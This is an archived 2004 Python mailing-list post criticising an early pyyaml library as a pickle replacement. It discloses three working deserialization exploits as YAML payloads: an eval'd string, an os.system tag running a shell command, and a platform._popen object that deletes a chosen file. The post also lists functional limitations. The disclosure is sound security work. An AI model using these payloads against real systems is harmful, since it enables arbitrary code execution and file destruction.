PyYaml?

Andrew Dalke adalke at mindspring.com
Mon Sep 20 02:24:33 EDT 2004


[Long post.  Summary is I've found three exploits in
pyyaml and at least five limitations w.r.t. the existing
Python pickles.  I DO NOT recommend anyone use pyyaml
when the input comes from untrusted code.

REPEAT: pyyaml allows ARBITRARY CODE TO BE EXECUTED.]

Me:
 >> Here's a test.  Can you do the following in YAML and do
 >> so securely?  (Untested code.)

Chris S. wrote:
> Conceptually, yes. That code would work fine with a full YAML 
> implementation. Admittedly, the current pure-Python implementation is 
> not yet complete. I didn't mean to imply that the current YAML 
> implementations were drop-in replacements for Pickle, only that the 
> concept of YAML is deserving of more attention.

This original thread started with you asking:
 > Is there any benefit to Pickle over YAML?

You have since distinguished between two YAMLs, the conceptual
one and the concrete one.

If it's the latter then the answer we've made several times
is that YAML as currently implemented is not able to replace
pickle.  You here agree with us.

Let's suppose YAML-the-concept was implemented.  That's
going to call for a lot of work so that the implementation
meets the concept, and well beyond what's been done so far.

For example, to be a viable pickle replacement will require
a C implementation because the performance is important.
The pure Python version "pickle.py" wasn't fast enough so
Someone (Jim Fulton, as I recall) contributed cPickle.

You'll also need a non-recursive implementation.  Here's
a test with the pyyaml version I just got from svn using
a very deep data structure.  It hits Python's recursion
limit:

 >>> x = ()
 >>> for i in range(600):
...   x = (x,)
...
 >>> import yaml
 >>> import cPickle
 >>> yaml.dump(x)
Traceback (most recent call last):
   File "<stdin>", line 1, in ?
   File "yaml/dump.py", line 18, in dump
     return Dumper().dump(*data)
   File "yaml/dump.py", line 43, in dump
     self.dumpDocuments(data)
   File "yaml/dump.py", line 61, in dumpDocuments
     self.dumpData(obj)
   File "yaml/dump.py", line 90, in dumpData
    .....
     self.dumpList(data)
   File "yaml/dump.py", line 138, in dumpList
     self.indentDump(item)
   File "yaml/dump.py", line 67, in indentDump
     self.dumpData(data)
RuntimeError: maximum recursion depth exceeded
 >>> cPickle.dumps(x)
'(((((((  ... many characters deleted ...tp331\ntp332\ntp333\n.'
 >>>

It doesn't handle tuples, only lists

 >>> print yaml.load(yaml.dump( (1,2,3) )).next()
[1, 2, 3]
 >>>


I see it doesn't handle Unicode correctly.  Here
it doesn't round-trip a Unicode character back to
Unicode.

 >>> s = unicode("\xfe", "latin1")
 >>> s
u'\xfe'
 >>> print s.encode("utf8")  # Should be a thorn character
þ
 >>> x= iter(yaml.load(yaml.dump(s))).next()
 >>> x
'\xfe'
 >>>

Digging deeper into the YAML implementation I see
it really doesn't handle Unicode correctly -- there's
even a *MAJOR* security hole.  Watch this.  I'll
start with a hand-crafted YAML file and read it.

% cat test.yaml
--- "\u000a"+' '.join(__import__('os').listdir('.')) + ""
% python
Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
[GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
 >>> import yaml
 >>> yaml.loadFile("test.yaml")
<yaml.load.Parser instance at 0x69a58>
 >>> _.next()
u'\n.svn assets docs examples experimental patches README scripts 
setup.py test.yaml TESTING yaml'
 >>>

See how it eval'ed the embedded and artibrary
Python code in the string it thought was Unicode?
That's because the code in implicit.py doesn't fully
verify the string before eval'ing it, in

     if val[0] == '"' and val[-1] == '"':
         if re.search(r"\u", val):
             val = "u" + val
         unescapedStr = eval (val)


This code is also suspect, from klass.py

def makeClass(module, classname, dict):
     exec('import %s' % (module))
     klass = eval('%s.%s' % (module, classname))
     obj = new.instance(klass)
     if hasMethod(obj, 'from_yaml'):
         return obj.from_yaml(dict)
     obj.__dict__ = dict
     return obj


Yep, here's an exploit against it.  The chr(32) is needed because
there's some sort of split on space upstream so I can't embed
spaces directly.  But I can construct them so this shows that
I can pass arbitrary commands to the shell.  (Note: the s= ...
assignment is all on one line.)

 >>> s = """--- !!os;os.system("ls"+chr(32)+"-l"+chr(32)+"/");1.2 {}\n\n"""
 >>> import yaml
 >>> yaml.load(s).next()
total 326905
drwxrwxr-x  51 root   admin       1734 12 Sep 19:16 Applications
drwxrwxr-x  21 root   admin        714 21 Jun  2003 Applications (Mac OS 9)
lrwxr-xr-x   1 root   admin         15 17 Feb  2003 Desktop (Mac OS 9) 
rebuild
    ... many lines delete ...
drwxr-xr-x  12 root   wheel        408 12 Sep  2003 usr
lrwxr-xr-x   1 root   admin         11 14 Feb  2004 var -> private/var
Traceback (most recent call last):
   File "<stdin>", line 1, in ?
   File "yaml/load.py", line 83, in next
     return self.parse_value(indicator)
   File "yaml/load.py", line 168, in parse_value
     value = self.parse_unaliased_value(value)
   File "yaml/load.py", line 179, in parse_unaliased_value
     return self.typeResolver.resolveType(value, url)
   File "yaml/klass.py", line 12, in resolveType
     return makeClass(moduleName, className, data)
   File "yaml/klass.py", line 16, in makeClass
     klass = eval('%s.%s' % (module, classname))
   File "<string>", line 1
     os;os.system("ls"+chr(32)+"-l"+chr(32)+"/");1.2
       ^
SyntaxError: invalid syntax
 >>>

Note that I was able to generate the os.system call
before the SyntaxError.

Here's another exploit.  It's a variation of the "delete
an arbitrary file" example I posted that you replied could
be made secure "conceptually".  It works because the
platform._popen class deletes the temporary file on __del__.

[Andrew-Dalkes-Computer:~/cvses/pyyaml/trunk] dalke% cat rmfile.yaml
--- !!platform._popen
bufsize: ~
mode: r
pipe: ~
tmpfile: delete_this_file.txt

% ls -l delete_this_file.txt
-rw-r--r--  1 dalke  staff  28 19 Sep 23:00 delete_this_file.txt
% python
Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
[GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
 >>> import yaml
 >>> yaml.loadFile("rmfile.yaml").next()
<platform._popen instance at 0x8b940>
 >>> ^D
% ls -l delete_this_file.txt
ls: delete_this_file.txt: No such file or directory
%



Oh, and I already mentioned that you need support
for __slots__.  It also looks like pyyaml doesn't support
classes derived from builtins, as in

 >>> class MyList(list):
...     def blah(self): print "blah blah"
...
 >>> x=MyList([1,3,5])
 >>> x
[1, 3, 5]
 >>> x.blah()
blah blah
 >>> print yaml.dump(x)
--- [1, 3, 5]
 >>> yaml.load(yaml.dump(x)).next()
[1, 3, 5]
 >>> yaml.load(yaml.dump(x)).next().blah()
Traceback (most recent call last):
   File "<stdin>", line 1, in ?
AttributeError: 'list' object has no attribute 'blah'
 >>>

Because YAML the implementation is so far from YAML
the concept, and YAML the implementation is at least
as insecure as pickle, why should we look at YAML
any further?

In fact, I wouldn't even use pyyaml now for any of
my projects knowing just how insecure it is.


 > Given that Pickle is insecure, wouldn't it make
 > more sense to support a secure serialization format,
 > one that's even readable to boot, such as YAML?

Again, please tell me how you can have a "secure
serialization format" which prevents my "__del__
calls os.unlink on arbitrary filename" attack.  You've
said it's possible in the abstract.  The only way
I know is to register the classes that are safe
to deserialize.  But pickles already allow that.

So how would YAML-the-conceptual be any more
secure than pickles as they've existed for years?

And how long would it be until YAML-the-implementation
hopes to be comparable to pickles for both speed
and security?

For that matter, why doesn't pyyaml use the existing
protocol in Python to ask an instance for how to
serialize itself?  Why does it need to define a new one?

Finally, you said

 > the concept of YAML is deserving of more attention.

What is the concept?  Why is it more deserving
than, say, XML-RPC encoding, or SOAP's, or CORBA's
serialization, or David Mertz' xml_pickle, or
Twisted's jelly, or any of a dozen other
serializations?

  - it's not as fast, nor as small as a binary pickle
      done with cPickle
  - it doesn't understand tuples vs. lists
  - it doesn't have the buzz of XML (and XML
      advocates also claim readability)
  - it doesn't have jelly's upversioning support (when
      I looked at it, Twisted allowed classes to
      describe how to upgrade older pickles to conform
      with changes in the class)
  - it doesn't have the validation tools that CORBA
      has to ensure that received data fields are at
      least the correct types

Some are limitations of the implementation, but the
bar is pretty high so it's up to the advocates (and
of the years YAML's been about you're the first I've
seen) to prove it's deserving.

				Andrew
				dalke at dalkescientific.com



More information about the Python-list mailing list